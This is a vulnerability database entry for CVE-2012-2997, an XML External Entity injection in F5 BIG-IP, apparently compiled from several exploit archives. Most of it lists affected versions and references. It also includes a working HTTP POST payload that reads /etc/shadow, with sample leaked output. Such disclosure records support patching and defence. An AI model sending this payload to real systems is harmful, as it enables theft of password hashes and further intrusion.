ID

VAR-E-201301-0169


CVE

cve_id:CVE-2012-2997

Trust: 2.4

sources: BID: 57496 // PACKETSTORM: 119738 // EXPLOIT-DB: 38233 // EDBNET: 60633

EDB ID

38233


TITLE

F5 Networks BIG-IP - XML External Entity Injection - Hardware remote Exploit

Trust: 0.6

sources: EXPLOIT-DB: 38233

DESCRIPTION

F5 Networks BIG-IP - XML External Entity Injection. CVE-2012-2997CVE-89447 . remote exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 38233

AFFECTED PRODUCTS

vendor:f5model:networks big-ipscope: - version: -

Trust: 1.0

vendor:f5model:big-ip xml external entityscope:eqversion:11.2.0

Trust: 0.5

vendor:f5model:big-ip womscope:eqversion:11.2

Trust: 0.3

vendor:f5model:big-ip womscope:eqversion:11.0

Trust: 0.3

vendor:f5model:big-ip womscope:eqversion:10.2.4

Trust: 0.3

vendor:f5model:big-ip womscope:eqversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip womscope:eqversion:11.1.0

Trust: 0.3

vendor:f5model:big-ip webacceleratorscope:eqversion:11.2.00

Trust: 0.3

vendor:f5model:big-ip webacceleratorscope:eqversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip webacceleratorscope:eqversion:11.1

Trust: 0.3

vendor:f5model:big-ip webacceleratorscope:eqversion:11.0

Trust: 0.3

vendor:f5model:big-ip webacceleratorscope:eqversion:10.2.4

Trust: 0.3

vendor:f5model:big-ip psmscope:eqversion:11.2

Trust: 0.3

vendor:f5model:big-ip psmscope:eqversion:11.1

Trust: 0.3

vendor:f5model:big-ip psmscope:eqversion:11.0

Trust: 0.3

vendor:f5model:big-ip psmscope:eqversion:10.2.4

Trust: 0.3

vendor:f5model:big-ip psmscope:eqversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip ltmscope:eqversion:11.2

Trust: 0.3

vendor:f5model:big-ip ltmscope:eqversion:11.0

Trust: 0.3

vendor:f5model:big-ip ltmscope:eqversion:10.2.4

Trust: 0.3

vendor:f5model:big-ip ltmscope:eqversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip ltmscope:eqversion:11.1.0

Trust: 0.3

vendor:f5model:big-ip link controllerscope:eqversion:11.2.00

Trust: 0.3

vendor:f5model:big-ip link controllerscope:eqversion:11.0.00

Trust: 0.3

vendor:f5model:big-ip link controllerscope:eqversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip link controllerscope:eqversion:11.1

Trust: 0.3

vendor:f5model:big-ip link controllerscope:eqversion:10.2.4

Trust: 0.3

vendor:f5model:big-ip gtmscope:eqversion:11.2

Trust: 0.3

vendor:f5model:big-ip gtmscope:eqversion:11.0

Trust: 0.3

vendor:f5model:big-ip gtmscope:eqversion:10.2.4

Trust: 0.3

vendor:f5model:big-ip gtmscope:eqversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip gtmscope:eqversion:11.1.0

Trust: 0.3

vendor:f5model:big-ip edge gatewayscope:eqversion:11.2

Trust: 0.3

vendor:f5model:big-ip edge gatewayscope:eqversion:11.1

Trust: 0.3

vendor:f5model:big-ip edge gatewayscope:eqversion:11.0

Trust: 0.3

vendor:f5model:big-ip edge gatewayscope:eqversion:10.2.4

Trust: 0.3

vendor:f5model:big-ip asmscope:eqversion:11.2.00

Trust: 0.3

vendor:f5model:big-ip asmscope:eqversion:11.0.00

Trust: 0.3

vendor:f5model:big-ip asmscope:eqversion:10.2.40

Trust: 0.3

vendor:f5model:big-ip asmscope:eqversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip asmscope:eqversion:11.1.0

Trust: 0.3

vendor:f5model:big-ip apmscope:eqversion:11.2

Trust: 0.3

vendor:f5model:big-ip apmscope:eqversion:11.0

Trust: 0.3

vendor:f5model:big-ip apmscope:eqversion:10.2.4

Trust: 0.3

vendor:f5model:big-ip apmscope:eqversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip apmscope:eqversion:11.1.0

Trust: 0.3

vendor:f5model:big-ip analyticsscope:eqversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip analyticsscope:eqversion:11.2

Trust: 0.3

vendor:f5model:big-ip analyticsscope:eqversion:11.1.0

Trust: 0.3

vendor:f5model:big-ip analyticsscope:eqversion:11.0.0

Trust: 0.3

vendor:f5model:big-ip womscope:neversion:11.3.0

Trust: 0.3

vendor:f5model:big-ip wom hf3scope:neversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip wom hf3scope:neversion:11.2.0

Trust: 0.3

vendor:f5model:big-ip wom hf5scope:neversion:10.2.4

Trust: 0.3

vendor:f5model:big-ip webacceleratorscope:neversion:11.3

Trust: 0.3

vendor:f5model:big-ip webaccelerator hf3scope:neversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip webaccelerator hf3scope:neversion:11.2

Trust: 0.3

vendor:f5model:big-ip webaccelerator hf5scope:neversion:10.2.4

Trust: 0.3

vendor:f5model:big-ip psmscope:neversion:11.3

Trust: 0.3

vendor:f5model:big-ip psm hf3scope:neversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip psm hf3scope:neversion:11.2.0

Trust: 0.3

vendor:f5model:big-ip psm hf5scope:neversion:10.2.4

Trust: 0.3

vendor:f5model:big-ip ltm hf3scope:neversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip ltm hf3scope:neversion:11.2

Trust: 0.3

vendor:f5model:big-ip ltmscope:neversion:11.3.0

Trust: 0.3

vendor:f5model:big-ip ltm hf5scope:neversion:10.2.4

Trust: 0.3

vendor:f5model:big-ip link controllerscope:neversion:11.3

Trust: 0.3

vendor:f5model:big-ip link controller hf3scope:neversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip link controller hf3scope:neversion:11.2

Trust: 0.3

vendor:f5model:big-ip link controller hf5scope:neversion:10.2.4

Trust: 0.3

vendor:f5model:big-ip gtmscope:neversion:11.3

Trust: 0.3

vendor:f5model:big-ip gtm hf3scope:neversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip gtm hf3scope:neversion:11.2.0

Trust: 0.3

vendor:f5model:big-ip gtm hf5scope:neversion:10.2.4

Trust: 0.3

vendor:f5model:big-ip edge gatewayscope:neversion:11.3

Trust: 0.3

vendor:f5model:big-ip edge gateway hf3scope:neversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip edge gateway hf3scope:neversion:11.2

Trust: 0.3

vendor:f5model:big-ip edge gateway hf5scope:neversion:10.2.4

Trust: 0.3

vendor:f5model:big-ip asmscope:neversion:11.3.0

Trust: 0.3

vendor:f5model:big-ip asm hf3scope:neversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip asm hf3scope:neversion:11.2.0

Trust: 0.3

vendor:f5model:big-ip asm hf5scope:neversion:10.2.4

Trust: 0.3

vendor:f5model:big-ip apmscope:neversion:11.3.0

Trust: 0.3

vendor:f5model:big-ip apm hf3scope:neversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip apm hf3scope:neversion:11.2.0

Trust: 0.3

vendor:f5model:big-ip apm hf5scope:neversion:10.2.4

Trust: 0.3

vendor:f5model:big-ip analyticsscope:neversion:11.3

Trust: 0.3

vendor:f5model:big-ip analytics hf3scope:neversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip analytics hf3scope:neversion:11.2

Trust: 0.3

sources: BID: 57496 // PACKETSTORM: 119738 // EXPLOIT-DB: 38233

EXPLOIT

source: https://www.securityfocus.com/bid/57496/info

F5 Networks BIG-IP is prone to an XML External Entity injection vulnerability.

Attackers can exploit this issue to obtain potentially sensitive information from local files on computers running the vulnerable application and to carry out other attacks.

POST /sam/admin/vpe2/public/php/server.php HTTP/1.1
Host: bigip
Cookie: BIGIPAuthCookie=*VALID_COOKIE*
Content-Length: 143

<?xml version="1.0" encoding='utf-8' ?>
<!DOCTYPE a [<!ENTITY e SYSTEM '/etc/shadow'> ]>
<message><dialogueType>&e;</dialogueType></message>

The response includes the content of the file:

<?xml version="1.0" encoding="utf-8"?>
<message><dialogueType>any</dialogueType><status>generalError</status><command>any</command><accessPolicyName>any</accessPolicyName><messageBody><generalErrorText>Client
has sent unknown dialogueType '
root:--hash--:15490::::::
bin:*:15490::::::
daemon:*:15490::::::
adm:*:15490::::::
lp:*:15490::::::
mail:*:15490::::::
uucp:*:15490::::::
operator:*:15490::::::
nobody:*:15490::::::
tmshnobody:*:15490::::::
admin:--hash--:15490:0:99999:7:::

Trust: 1.0

sources: EXPLOIT-DB: 38233

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 38233

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 38233

TYPE

XML External Entity Injection

Trust: 1.0

sources: EXPLOIT-DB: 38233

TAGS

tag:exploit

Trust: 0.5

tag:xxe

Trust: 0.5

sources: PACKETSTORM: 119738

CREDITS

anonymous

Trust: 0.6

sources: EXPLOIT-DB: 38233

EXTERNAL IDS

db:NVDid:CVE-2012-2997

Trust: 2.4

db:EXPLOIT-DBid:38233

Trust: 1.9

db:BIDid:57496

Trust: 1.9

db:EDBNETid:60633

Trust: 0.6

db:PACKETSTORMid:119738

Trust: 0.5

sources: BID: 57496 // PACKETSTORM: 119738 // EXPLOIT-DB: 38233 // EDBNET: 60633

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2012-2997

Trust: 2.1

url:https://www.securityfocus.com/bid/57496/info

Trust: 1.0

url:https://www.exploit-db.com/exploits/38233/

Trust: 0.6

url:https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20130122-0_f5_big-ip_xml_external_entity_injection_v10.txt

Trust: 0.3

url:https://www.exploit-db.com/exploits/38233

Trust: 0.3

url:http://support.f5.com/kb/en-us/solutions/public/14000/100/sol14138.html

Trust: 0.3

url:http://www.f5.com/products/big-ip/

Trust: 0.3

sources: BID: 57496 // PACKETSTORM: 119738 // EXPLOIT-DB: 38233 // EDBNET: 60633

SOURCES

db:BIDid:57496
db:PACKETSTORMid:119738
db:EXPLOIT-DBid:38233
db:EDBNETid:60633

LAST UPDATE DATE

2022-07-27T09:15:48.287000+00:00


SOURCES UPDATE DATE

db:BIDid:57496date:2013-01-21T00:00:00

SOURCES RELEASE DATE

db:BIDid:57496date:2013-01-21T00:00:00
db:PACKETSTORMid:119738date:2013-01-22T23:44:44
db:EXPLOIT-DBid:38233date:2013-01-21T00:00:00
db:EDBNETid:60633date:2013-01-21T00:00:00